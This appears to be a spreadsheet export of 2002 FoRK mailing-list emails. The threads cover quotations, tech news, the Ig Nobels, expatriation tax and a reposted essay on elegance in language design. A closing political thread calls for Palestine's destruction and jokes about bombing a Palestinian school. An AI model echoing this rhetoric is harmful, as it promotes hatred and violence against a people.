-- tel +44 (0)1483 301793, fax +44 (0)1483 561657
-- mail dave@chyp.com, web http://www.chyp.com
-- 
-- See you at the 2nd Annual Digital Transactions Forum in Singapore
-- October 16th/17th 2002, see http://www.digitaltransactionsforum.com/---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</si>
  <si>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At 1:16 AM -0400 on 10/3/02, Gary Lawrence Murphy wrote:
&gt;   "The first question I ask myself when something doesn't seem to be
&gt;   beautiful is why do I think it's not beautiful. And very shortly you
&gt;   discover that there is no reason." -- John Cage"When I'm working on a problem, I never think about beauty. I think only
how to solve the problem. But when I have finished, if the solution is not
beautiful, I know it is wrong."  -- R. Buckminster Fuller"Simplicity is the highest goal, achievable when you have overcome all
difficulties." -- Frederic Chopin"Externalities are the last refuge of the dirigistes." -- Friedrich Hayek-- 
-----------------
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"The stoical scheme of supplying our wants by lopping off our
desires is like cutting off our feet when we want shoes."
 -- Jonathan Swift
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == R A Hettinga  writes:    R&gt; "When I'm working on a problem, I never think about beauty. I
    R&gt; think only how to solve the problem. But when I have finished,
    R&gt; if the solution is not beautiful, I know it is wrong."  --
    R&gt; R. Buckminster Fuller"It was only /after/ I'd completed the geodesic dome that I noticed it
was beautiful" --- R. Buckminster Fuller-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">people with too much time on their hands..look at this first (8meg, so takes a loong time):http://www.ntk.net/2002/09/27/jesus_large.jpgand then look at this reduction:http://www.ntk.net/2002/09/27/jesus_small.jpg
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">
Actually this is output from an old java program called jitter.
It's very useful for those of us with digital cameras who end up
taking 50+ pictures a day while on vacation ;)-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
egad ... you mean there's two of them???  I knew there was a reason
my jobs board had jumped to the top of my traffic list.-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
To: rah@shipwright.com
From: hacker@vudu.net
Date: Thu, 03 Oct 2002 06:01:38 -0700 (PDT)
Subject: Re: The 3rd Annual Consult Hyperion Digital Identity ForumThe guy messed up his own URL. It should be
http://www.digitalidforum.com which redirects to
http://www.consult.hyperion.co.uk/digid3.html
"R. A. Hettinga" wrote:
&gt;
&gt; Dear All,
&gt;
&gt; See www.digitalidentityforum.com for more details. Speakers
include
&gt; Microsoft and Liberty Alliance, UK central and local government,
&gt; law
&gt; enforcement, financial services (Egg and RBS/NatWest), EC
Research
&gt; Centre, a
&gt; psychologist and others. Look forward to seeing you there.
&gt;
&gt; Regards,
&gt; Dave Birch.
&gt;
&gt; --
&gt; -- David Birch, Director, Consult Hyperion
&gt; --
&gt; -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
&gt; -- mail dave@chyp.com, web http://www.chyp.com
&gt; --
&gt; -- See you at the 2nd Annual Digital Transactions Forum in
&gt; Singapore
&gt; -- October 16th/17th 2002, see
&gt; http://www.digitaltransactionsforum.com/
&gt;
&gt; --- end forwarded text
&gt;
&gt;
&gt; --
&gt; -----------------
&gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
&gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;;
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its usefulness and
&gt; antiquity,
&gt; [predicting the end of the world] has not been found agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of the
Roman
&gt; Empire'
&gt;
&gt; For help on using this list (especially unsubscribing), send a
&gt; message to
&gt; "dcsb-request@reservoir.com" with one line of text:
"help".---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t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "S" == Stephen D Williams  writes:    S&gt; The purpose of our lives is to be free of all addictive traps,
    S&gt; and thus become one with the ocean of Living Love."One choice is a psychosis.  Two, a neurosis" -- Ven Joan Shikai
Woodward, Northern Mountain Order of the White Wind Zen Communityjust a thought.(oh, yes, the bits: Women in Zen - http://lhamo.tripod.com/2zen.htm)-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Dyno-Staff.I have to say however that, having found this while looking for 
something completely unrelated, it has some cute truisms.  I 
particularly like their addiction to non-addiction.  Additionally, the 
Mindprod treehugger site has some interesting quotes, etc.To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models.I found that a few of the principles could be used to explain and 
justify US/UN foreign policy and actions.http://mindprod.com/methods.html
http://members.aol.com/inossence/Kenkey.html
http://www.mindprod.com/
(Apologies for the embedded HTML.)We create the world we live in.
A loving person lives in a loving world,
A hostile person lives in a hostile world.
Everyone you meet is your mirror.You make yourself and others suffer just as much when you take offence 
as when you give offence. To be upset over what you don't have is to 
waste what you do have.The past is dead,
The future is imaginary,
Happiness can only be
in the Eternal Now MomentHow soon will you realize that the only thing you don't have is the 
direct experience that there's nothing you need that you don't have.Love a person because he or she is there.
This is the only reason.Happiness happens when your consciousness is not dominated by addictions 
and demands~ and you experience life as a parade of preferences.The
purpose
of our lives
is to be free
of all addictive traps,
and thus
become one
with the ocean of
Living Love.
sdw-- 
sdw@lig.net http://sdw.st
Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t xml:space="preserve">draw the pain"Ken never wrote about this method, but he often demonstrated it in
workshops. Let us say you have a physical pain somewhere in your body. You
draw the pain in the air with your finger, about 30 cm (1 foot) high. Take
about 60 seconds to trace around the perimeter of the pain, carefully
listening to the pain to find the precise boundary between where it hurts
and where it does not. Repeat. You will find that after about 10 minutes of
this the pain will shift, shrink or disappear. A variant of this is to
imagine making a 3D model the pain in coloured clay."Works!  There's this coworker - a real pain in my ass!  I used my middle
finger to trace his outline for about 60 seconds.  I listened to him, found
the boundary, and repeated the motion.  He left my office!
-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
Stephen D. Williams
Sent: Thursday, October 03, 2002 5:33 PM
To: fork@spamassassin.taint.org
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Dyno-Staff.I have to say however that, having found this while looking for
something completely unrelated, it has some cute truisms.  I
particularly like their addiction to non-addiction.  Additionally, the
Mindprod treehugger site has some interesting quotes, etc.To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models.I found that a few of the principles could be used to explain and
justify US/UN foreign policy and actions.http://mindprod.com/methods.html
http://members.aol.com/inossence/Kenkey.html
http://www.mindprod.com/
(Apologies for the embedded HTML.)We create the world we live in.
A loving person lives in a loving world,
A hostile person lives in a hostile world.
Everyone you meet is your mirror.You make yourself and others suffer just as much when you take offence
as when you give offence. To be upset over what you don't have is to
waste what you do have.The past is dead,
The future is imaginary,
Happiness can only be
in the Eternal Now MomentHow soon will you realize that the only thing you don't have is the
direct experience that there's nothing you need that you don't have.Love a person because he or she is there.
This is the only reason.Happiness happens when your consciousness is not dominated by addictions
and demands~ and you experience life as a parade of preferences.The
purpose
of our lives
is to be free
of all addictive traps,
and thus
become one
with the ocean of
Living Love.
sdw--
sdw@lig.net http://sdw.st
Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t>On 10/2/02 12:00 PM, "Mr. FoRK"  wrote:
&gt; What about a situation where you don't directly ask/talk to the bot, but
&gt; they listen in and advise/correct/interject/etc?
&gt; example: two people discussing trips, etc. may trigger a weather bot to
&gt; mention what the forecast says - without directly being asked.My guess is it's more insidious than that, it's going to be ActiveSpam."Oh, you're going to Seattle? I can get you airline tickets for less"Yuck
-- 
peregrine   \PEH-ruh-grun or PEH-ruh-green\   (adjective)
     : having a tendency to wander</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Fork,  http://www.pimprig.com/sections.php?op=viewarticle&amp;artid=72&amp;page=2  This kid has -way- WAY too much time on his hands.-- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Not exactly new bits, but I enjoyed seeing The Economist
pick up on the similarity between computer and social
networks:http://www.economist.com/science/displayStory.cfm?story_id=1365118
_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,Carey wants you to know about a story on www.theage.com.au
Personal Message:
Ah the Ig Nobels, always worth a read :)  If only they had a cat-mood decipherer.  ^__^Navel gazing wins an Ig Nobel
By Jay Lindsay Boston
October 05 2002URL: http://www.theage.com.au/articles/2002/10/04/1033538774048.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
... nor what color your passport?More American exceptionalism:
&gt; "The United States is the only country in the world to tax its citizens
&gt; on a worldwide basis, irrespective of whether they spend time in the
&gt; country or whether they have assets there," said Philip Marcovici,
&gt; a Zurich-based lawyer with international law firm Baker and Mackenzie.and perhaps even irrespective of their
current citizenship:&gt; Under current expatriation law, there are wealth thresholds based on
&gt; net worth which lead to a presumption that a person giving up U.S.
&gt; citizenship is doing so for tax reasons.
&gt;
&gt; Individuals who have given up their citizenship and who have earned
&gt; $100,000 in any one of the 10 years before expatriation, or who have a
&gt; net worth exceeding $500,000, would automatically be deemed a so-called
&gt; "taxpatriate." Those persons would be subject to ordinary income tax
&gt; on U.S. source income for 10 years. They would also be subject to
&gt; U.S. estate and gift tax during the 10-year period.I suppose it could be much worse;
there could be some twee affinity
program for US citizenship, and a
bank of phone people who only get
paid well if they manage to keep
one from cancelling membership...-Dave:::::::&gt; Last month, Congress proposed a new exit tax on all citizens who give up
&gt; their U.S. status. If the proposal becomes law, individuals will be taxed
&gt; as if they had either sold everything or died. This would give rise to
&gt; immediate exposure to capital gains tax.To be fair, would this mean that they'd
also immediately pay out the difference
for anyone whose tax basis was greater
than current estate value?:::::::
&gt; ... Australian cities overall scored particularly highly in the
&gt; [Economist Intelligence Unit] survey [of desirability for expats],
&gt; with all five the country's urban centres surveyed ranked near the
&gt; top of the table.
&gt; 
&gt; Europe was also well represented among the top 10 places. 
&gt; 
&gt; The top US city, Honolulu, ranked 21st, with Boston, at 28th, the
&gt; highest ranked city on the US mainland. Canada, in contrast, sneaked
&gt; three cities into the top ten.
&gt; 
&gt; The UK cities of London, 44th, and Manchester, 50th, gained only a
&gt; mid-table rating, with Port Moresby in Papua New Guinea bottom of
&gt; the list.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Don't know much about eRoom - but there is the magic phrase 'collaborate in
real-time'... Groove really has people running scared. Wonder if any users
actually /benefit/ from collaborating in real-time.
===
http://www.internetwk.com/breakingNews/INW20021004S0001Content-management vendor Documentum said late Thursday it plans to acquire
privately held e-Room Technologies in a deal worth about $100 million.Documentum will issue approximately 7.7 million shares of its common stock
and pay about $12.6 million in cash for all of the outstanding shares of
eRoom.Documentum makes a platform for enterprise-wide content management. ERoom
makes tools for enterprise collaboration. Its customers include Airbus,
Bausch &amp; Lomb, Ford Motor Co., and Sony.Documentum announced plans this summer to deliver a new Collaboration
Edition of its content-management suite. ERoom was already integrating its
tools to the Documentum platform, making an acquisition an easy target,
according to Documentum president and CEO Dave DeWalt.With the upcoming joint product, customers will be able to collaborate in
real-time via virtual workspaces, sharing schedules, resources, and even
jointly creating content.Content creation and management has always been a collaborative task, but
workflow has usually been delivered via a Web browser interface or even
simple e-mail -- and rarely in real-time.For now, Documentum will sell the eRoom platform and its own
content-management system through combined sales channels. Further
integration is planned down the line, the companies said.</t>
  </si>
  <si>
    <t xml:space="preserve">On 4/10/02 1:13 am, someone e-said:&gt; The guy messed up his own URL. It should be
&gt; http://www.digitalidforum.com which redirects to
&gt; http://www.consult.hyperion.co.uk/digid3.htmlI didn't mess it up: I f*cked it up by not paying attention to a
copy-and-paste from something else.Next time, I really will leave it to the PR guys.Best regards,
Dave Birch._______________________________________________
Irregulars mailing list
Irregulars@tb.tf
http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t>"Groove really has people running scared"....oh shit here comes that Groove thingy, run for your life ;-)
----- Original Message -----
From: "Mr. FoRK" 
To: 
Sent: Friday, October 04, 2002 8:12 PM
Subject: Documentum Acquires E-Room, Melding Content, Collaboration
&gt;
&gt; Don't know much about eRoom - but there is the magic phrase 'collaborate
in
&gt; real-time'... Groove really has people running scared. Wonder if any users
&gt; actually /benefit/ from collaborating in real-time.
&gt;
&gt;
&gt; ===
&gt; http://www.internetwk.com/breakingNews/INW20021004S0001
&gt;
&gt; Content-management vendor Documentum said late Thursday it plans to
acquire
&gt; privately held e-Room Technologies in a deal worth about $100 million.
&gt;
&gt; Documentum will issue approximately 7.7 million shares of its common stock
&gt; and pay about $12.6 million in cash for all of the outstanding shares of
&gt; eRoom.
&gt;
&gt; Documentum makes a platform for enterprise-wide content management. ERoom
&gt; makes tools for enterprise collaboration. Its customers include Airbus,
&gt; Bausch &amp; Lomb, Ford Motor Co., and Sony.
&gt;
&gt; Documentum announced plans this summer to deliver a new Collaboration
&gt; Edition of its content-management suite. ERoom was already integrating its
&gt; tools to the Documentum platform, making an acquisition an easy target,
&gt; according to Documentum president and CEO Dave DeWalt.
&gt;
&gt; With the upcoming joint product, customers will be able to collaborate in
&gt; real-time via virtual workspaces, sharing schedules, resources, and even
&gt; jointly creating content.
&gt;
&gt; Content creation and management has always been a collaborative task, but
&gt; workflow has usually been delivered via a Web browser interface or even
&gt; simple e-mail -- and rarely in real-time.
&gt;
&gt; For now, Documentum will sell the eRoom platform and its own
&gt; content-management system through combined sales channels. Further
&gt; integration is planned down the line, the companies said.
&gt;
&gt;
&gt;</t>
  </si>
  <si>
    <t>Does anyone know what happened to vCard support in Netscape 7.0/Mozilla 
1.1?
 (Not there yet in Mozilla and therefore not in the new mail engine I 
presume?)Netscape Messenger/Mozilla have LDAP LDIF import/export, but I can't 
find vCard or a reference to it anywhere.  I like the Netscape/Mozilla 
email client.  I avoid LookOut for at least two reasons: Windows Only 
(my main environment is Linux with 30% on Windows) and security issues.Now that LDAP, and the related DSML and DNS SRV record methods, are 
becoming more popular, is there a decline of vCard?
Is there a standard emerging to deal with the mismatch in naming between 
the two?I've brushed with directories in the past, but I'm getting in deep along 
with more PKI oriented focus.  Any wisdom would be appreciated.  In 
particular, I'm going to start integrating smart cards into my linux and 
Win32 systems and integrating them with Netscape Messenger/Mozilla and 
Outlook.Thanks
sdw</t>
  </si>
  <si>
    <t>"British scientists were honoured for research that found ostriches became
more amorous with each other when a human was around. In fact, ostriches
eventually started putting the moves on humans."this is true of manatees also.  you don't want to know.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Carey
Sent: Friday, October 04, 2002 2:03 PM
To: fork@spamassassin.taint.org
Subject: Headline - Navel gazing wins an Ig Nobel
Greetings,Carey wants you to know about a story on www.theage.com.au
Personal Message:
Ah the Ig Nobels, always worth a read :)  If only they had a cat-mood
decipherer.  ^__^Navel gazing wins an Ig Nobel
By Jay Lindsay Boston
October 05 2002URL: http://www.theage.com.au/articles/2002/10/04/1033538774048.html</t>
  </si>
  <si>
    <t xml:space="preserve">Geege Schuman wrote:&gt;"British scientists were honoured for research that found ostriches became
&gt;more amorous with each other when a human was around. In fact, ostriches
&gt;eventually started putting the moves on humans."
&gt;
&gt;this is true of manatees also.  you don't want to know.
&gt;
&gt;  
&gt;
So how much of it is due to jumping the inter-species boundary for 
STATUS - i.e. I can fuck any of several
reasonable candidates from my own species, or I can  be ambitious, and 
go after the authority figure in the room.
The alternative hypothesis is that its due to novelty, and then of 
course, there's the "they'll fuck anything  given
appropriate conditions." Hmmm, is this a potential intelligence test, 
seeing as the last is a particularily human response?Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">The structure of the Internet has never
been about where the ditches and ruts
are dug although the world needs
ditch diggers too.It's a simple inductive concept:
You are you and see the world as such,
You plus 1 degree of separation is a new you.All this stuff about scale-free Internets, viruses,
sex, and money is silly.  Scale-free statistically
indistinguishable models really means Internet-Scale
as rediscovered by social networks people.&gt; Research has shown that the network of human sexual partners 
 &gt; seems to be scale-free, tooI tend to prefer the Harvard Business Review
to the Economist as they tend to spend less
time writing about who's sleeping with whom and
come up with real statistical models.GregLies, Damn lies, and statistics.
Russell Turpin wrote:
&gt; Not exactly new bits, but I enjoyed seeing The Economist
&gt; pick up on the similarity between computer and social
&gt; networks:
&gt; 
&gt; http://www.economist.com/science/displayStory.cfm?story_id=1365118
&gt; 
&gt; 
&gt; 
&gt; 
&gt; _________________________________________________________________
&gt; Chat with friends online, try MSN Messenger: http://messenger.msn.com
&gt; 
&gt; 
-- 
Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
gbolcer at endeavors.com  | http://endeavors.com
Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
&gt; R. Buckminster Fuller
&gt; 
&gt; "It was only /after/ I'd completed the geodesic dome that I noticed it
&gt; was beautiful" --- R. Buckminster Fuller
I had cited the information theoretic concept of "elegance"
in my dissertation &amp; did a Google to find the reference and instead
found a really great tech report for UoT Knoxville by Bruce
MacLennan.  He cites Efficiency, Economy, and Elegance, but
I think he's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Greg[1] http://www.cs.utk.edu/~mclennan/anon-ftp/Elegance.html``Who Cares About Elegance?''        The Role of Aesthetics in Programming Language Design                            Technical Report UT-CS-97-344                                 Bruce J. MacLennan                            Computer Science Department
                           University of Tennessee, Knoxville
                               MacLennan@cs.utk.edu AbstractThe crucial role played by aesthetics in programming language design and the importance of elegance in
programming languages are defended on the basis of analogies with structural engineering, as presented in
Billington's The Tower and the Bridge. This report may be used for any nonprofit purpose provided that its source is acknowledged. It will be adapted
for
inclusion in the third edition of my Principles of Programming Languages. 
   1.The Value of Analogies 
   2.Efficiency Seeks to Minimize Resources Used 
   3.Economy Seeks to Maximize Benefit versus Cost 
   4.Elegance Symbolizes Good Design 
       1.For the Designer 
       2.For the User 
   5.The Programming Language as Work Environment 
   6.Acquiring a Sense of Elegance 
   7.References The Value of AnalogiesProgramming language design is a comparatively new activity -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 Model T, C =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Billington, there are three values common to many technological activities, which we can call
``the
three E's'': Efficiency, Economy and Elegance. These values correspond to three dimensions of technology,
which
Billington calls the scientific, social and symbolic dimensions (the three S's). We will consider each in
turn. 
Efficiency Seeks to Minimize Resources UsedIn structural engineering, efficiency deals with the amount of material used; the basic criterion is safety
and the
issues are scientific (strength of materials, disposition of forces, etc.). Similarly, in programming language
design,
efficiency is a scientific question dealing with the use of resources. There are many examples where
efficiency
considerations influenced programming language design (some are reviewed in my Principles of Programming
Languages). In the early days, the resources to be minimized were often runtime memory usage and processing
time, although compile-time resource utilization was also relevant. In other cases the resource economized was
programmer typing time, and there are well-known cases in which this compromised safety (e.g. FORTRAN's
implicit declarations). There are also many well-known cases in which security (i.e. safety) was sacrificed
for the
sake of efficiency by neglecting runtime error checking (e.g. array bounds checking). Efficiency issues often can be quantified in terms of computer memory or time, but we must be careful that we
are
not comparing apples and oranges. Compile time is not interchangeable run time, and neither one is the same as
programmer time. Similarly, computer memory cannot be traded off against computer time unless both are
reduced to a common denominator, such as money, but this brings in economic considerations, to which we now
turn. 
Economy Seeks to Maximize Benefit versus CostWhereas efficiency is a scientific issue, economy is a social issue. In structural engineering, economy seeks
to
maximize social benefit compared to its cost. (This is especially appropriate since structures like bridges
are
usually built at public expense for the benefit of the public.) In programming language design, the ``public''
that
must be satisfied is the programming community that will use the language and the institutions for which these
programmers work. Economic tradeoffs are hard to make because economic values change and are difficult to predict. For example,
the shift from first to second generation programming languages was largely a result of a decrease in the cost
of
computer time compared to programmer time, the shift from the second to the third generation involved the
increasing cost of residual bugs in programs, and the fourth generation reflected the increasing cost of
program
maintenance compared to program development. Other social factors involved in the success or failure of a programming language include: whether major
manufacturers support the language, whether prestigious universities teach it, whether it is approved in some
way
by influential organizations (such as the US Department of Defense), whether it has been standardized, whether
it
comes to be perceived as a ``real'' language (used by ``real programmers'') or as a ``toy'' language (used by
novices
or dilettantes), and so forth. As can be seen from the historical remarks in my Principles, social factors are
frequently more important than scientific factors in determining the success or failure of a programming
language. Often economic issues can be quantified in terms of money, but the monetary values of costs and benefits are
often
unstable and unpredictable because they depend on changing market forces. Also, many social issues, from
dissatisfaction with poorly designed software to human misery resulting from system failures, are inaccurately
represented by the single dimension of monetary cost. All kinds of ``cost'' and ``benefit'' must be considered
in
seeking an economical design. 
Elegance Symbolizes Good Design``Elegance? Who cares about elegance?'' snorts the hard-nosed engineer, but Billington shows clearly the
critical
role of elegance in ``hard-nosed'' engineering. For the DesignerIt is well-known that feature interaction poses a serious problem for language designers because of the
difficulty
of analyzing all the possible interactions of features in a language (see my Principles for examples).
Structural
engineers face similar problems of analytic complexity, but Billington observes that the best designers don't
make
extensive use of computer models and calculation. One reason is that mathematical analysis is always incomplete. The engineer must make a decision about which
variables are significant and which are not, and an analysis may lead to incorrect conclusions if this
decision is not
made well. Also, equations are often simplified (e.g., made linear) to make their analysis feasible, and this
is
another potential source of error. Because of these limitations, engineers that depend on mathematical
analysis
may overdesign a structure to compensate for unforeseen effects left out of the analysis. Thus the price of
safety is
additional material and increased cost (i.e. decreased efficiency and economy). Similarly in programming language design, the limitations of the analytic approach often force us to make a
choice between an under-engineered design, in which we run the risk of unanticipated interactions, and an
over-engineered design, in which we have confidence, but which is inefficient or uneconomical. Many people have seen the famous film of the collapse in 1940 of the four-month-old Tacoma Narrows bridge; it
vibrated itself to pieces in a storm because aerodynamical stability had not been considered in its design.
Billington explains that this accident, along with a number of less dramatic bridge failures, was a
consequence of
an increasing use of theoretical analyses that began in the 1920s. However, the very problem that destroyed
the
Tacoma Narrows bridge had been anticipated and avoided a century before by bridge designers who were guided
by aesthetic principles. According to Billington, the best structural engineers do not rely on mathematical analysis (although they do
not
abandon it altogether). Rather, their design activity is guided by a sense of elegance. This is because
solutions to
structural engineering problems are usually greatly underdetermined, that is, there are many possible
solutions to a
particular problem, such as bridging a particular river. Therefore, expert designers restrict their attention
to
designs in which the interaction of the forces is easy to see. The design looks unbalanced if the forces are
unbalanced, and the design looks stable if it is stable. The general principle is that designs that look good will also be good, and therefore the design process can
be
guided by aesthetics without extensive (but incomplete) mathematical analysis. Billington expresses this idea
by
inverting the old architectural maxim and asserting that, in structural design, function follows form. He adds
(p.
21), ``When the form is well chosen, its analysis becomes astoundingly simple.'' In other words, the choice of
form is open and free, so we should pick forms where elegant design expresses good design (i.e. efficient and
economical design). If we do so, then we can let aesthetics guide design. The same applies to programming language design. By restricting our attention to designs in which the
interaction
of features is manifest - in which good interactions look good, and bad interactions look bad - we can let our
aesthetic sense guide our design and we can be much more confident that we have a good design, without having
to
check all the possible interactions. For the UserIn this case, what's good for the designer also is good for the user. Nobody is comfortable crossing a bridge
that
looks like it will collapse at any moment, and nobody is comfortable using a programming language in which
features may ``explode'' if combined in the wrong way. The manifest balance of forces in a well-designed
bridge
gives us confidence when we cross it. So also, the manifestly good design of our programming language should
reinforce our confidence when we program in it, because we have (well-justified) confidence in the
consequences
of our actions. We accomplish little by covering an unbalanced structure in a beautiful facade. When the bridge is unable to
sustain the load for which it was designed, and collapses, it won't much matter that it was beautiful on the
outside.
So also in programming languages. If the elegance is only superficial, that is, if it is not the manifestation
of a
deep coherence in the design, then programmers will quickly see through the illusion and loose their
(unwarranted)
confidence. In summary, good designers choose to work in a region of the design space where good designs look good. As a
consequence, these designers can rely on their aesthetic sense, as can the users of the structures (bridges or
programming languages) they design. We may miss out on some good designs this way, but they are of limited
value unless both the designer and the user can be confident that they are good designs. We may summarize the
preceding discussion in a maxim analogous to those in my Principles of Programming Languages: 
                                The Elegance Principle              Confine your attention to designs that look good because they are good. The Programming Language as Work EnvironmentThere are other reasons that elegance is relevant to a well-engineered programming language. The programming
language is something the professional programmer will live with - even live in. It should feel comfortable
and
safe, like a well-designed home or office; in this way it can contribute to the quality of the activities that
take
place within it. Would you work better in an oriental garden or a sweatshop? A programming language should be a joy to use. This will encourage its use and decrease the programmer's
fatigue
and frustration. The programming language should not be a hindrance, but should serve more as a collaborator,
encouraging programmers to do their jobs better. As some automobiles are ``driving machines'' and work as a
natural extension of the driver, so a programming language should be a ``programming machine'' by encouraging
the programmer to acquire the smooth competence and seemingly effortless skill of a virtuoso. The programming
language should invite the programmer to design elegant, efficient and economical programs. Through its aesthetic dimension a programming language symbolizes many values. For example, in the variety of
its features it may symbolize profligate excess, sparing economy or asceticism; the kind of its features may
represent intellectual sophistication, down-to-earth practicality or ignorant crudeness. Thus a programming
language can promote a set of values. By embodying certain values, it encourages us to think about them; by
neglecting or negating other values, it allows them to recede into the background and out of our attention.
Out of
sight, out of mind. 
Acquiring a Sense of EleganceAesthetics is notoriously difficult to teach, so you may wonder how you are supposed to acquire that refined
sense
of elegance necessary to good design. Billington observes that this sense is acquired through extensive
experience
in design, which, especially in Europe, is encouraged by a competitive process for choosing bridge designers.
Because of it, structural engineers design many more bridges than they build, and they learn from each
competition they loose by comparing their own designs with those of the winner and other losers. The public
also
critiques the competing designs, and in this way becomes more educated; their sense of elegance develops along
with that of the designers. So also, to improve as a programming language designer you should design many languages - design obsessively -
and criticize, revise and discard your designs. You should also evaluate and criticize other people's designs
and try
to improve them. In this way you will acquire the body of experience you will need when the ``real thing''
comes
along. 
References   1.Billington, David P., The Tower and the Bridge: The New Art of Structural Engineering, Princeton:
     Princeton University Press, 1983. Chapters 1 and 6 are the most relevant.    2.MacLennan, Bruce J., Principles of Programming Languages: Design, Evaluation, and Implementation,
     second edition, New York: Holt, Rinehart &amp; Winston (now Oxford University Press), 1987.
</t>
  </si>
  <si>
    <t xml:space="preserve">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it.http://reason.com/brickbats/bb-april.shtmlLinks to:http://www.cnsnews.com/ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
ve\200208\FOR20020807e.htmlPraeterea censeo Palestininem esse delendam.
</t>
  </si>
  <si>
    <t xml:space="preserve">she read the links. what must it be like, she wondered, to devote ones life
to pointing out  neighbors' mistakes, mishaps, inconsistencies and
frailties?gloating is definitely underrated in the good book - eh, john?bring it on,
gg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
Hall
Sent: Saturday, October 05, 2002 11:56 PM
To: FoRK
Subject: Our friends the Palestinians, Our servants in government.
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it.http://reason.com/brickbats/bb-april.shtmlLinks to:http://www.cnsnews.com/ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
ve\200208\FOR20020807e.htmlPraeterea censeo Palestininem esse delendam.
</t>
  </si>
  <si>
    <t xml:space="preserve">I propose they rename it "Charlie Heston High" and maybe the students  
will learn to take AR-15s with extended military-spec scopes and .223  
high-velocity ammo and start plinking innocent civilians at random in  
the suburbs of Washington.  That's far more effectual than blowing  
oneself up in a bus.In America these days, it seems that violence ascribed to any political  
doctrine foreign to Bushism is vile and repugnant.  But random violence  
is entertainment and intrigue.A couple of ex-FBI "consultants" speaking on the shootings in DC were  
quoted as saying the shooters, presumed to be a pair, were getting a  
"heroin-like high" from each successful kill and that they "for  
whatever reason decided to level the playing field, thumbing their nose  
at law enforcement and society."See?  Just a couple of kids having fun with Daddy's semi-automatic  
hunting rifle.  Harmless!-Ian.	On Saturday, October 5, 2002, at 11:01 PM, John Hall wrote:&gt;
&gt; It wasn't gloating, it was one for the horror file.
&gt;
&gt; And of course for the Palestinians it wasn't a mistake, which is a key
&gt; part of the horror.
&gt;
&gt; I'm not against American taxpayers remodeling a school honoring a  
&gt; killer
&gt; if we do it with a daisy cutter.
&gt;
&gt;
&gt;
&gt;&gt; -----Original Message-----
&gt;&gt; From: Geege Schuman [mailto:geege@barrera.org]
&gt;&gt; Sent: Saturday, October 05, 2002 9:35 PM
&gt;&gt; To: johnhall@evergo.net; FoRK
&gt;&gt; Subject: RE: Our friends the Palestinians, Our servants in government.
&gt;&gt;
&gt;&gt; she read the links. what must it be like, she wondered, to devote ones
&gt;&gt; life
&gt;&gt; to pointing out  neighbors' mistakes, mishaps, inconsistencies and
&gt;&gt; frailties?
&gt;&gt;
&gt;&gt; gloating is definitely underrated in the good book - eh, john?
&gt;&gt;
&gt;&gt; bring it on,
&gt;&gt; gg
&gt;&gt;
&gt;&gt; -----Original Message-----
&gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
&gt; John
&gt;&gt; Hall
&gt;&gt; Sent: Saturday, October 05, 2002 11:56 PM
&gt;&gt; To: FoRK
&gt;&gt; Subject: Our friends the Palestinians, Our servants in government.
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; Hijacker High (8/30)
&gt;&gt; Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus
&gt;&gt; hijacking in which 36 Israelis and an American nature photographer,
&gt; Gail
&gt;&gt; Ruban, were killed. Mughrabi has a Palestinian high school named after
&gt;&gt; her, and it's apparently starting to show signs of wear. Fortunately,
&gt;&gt; the United States Agency for International Development has stepped in
&gt;&gt; with money to help renovate it.
&gt;&gt;
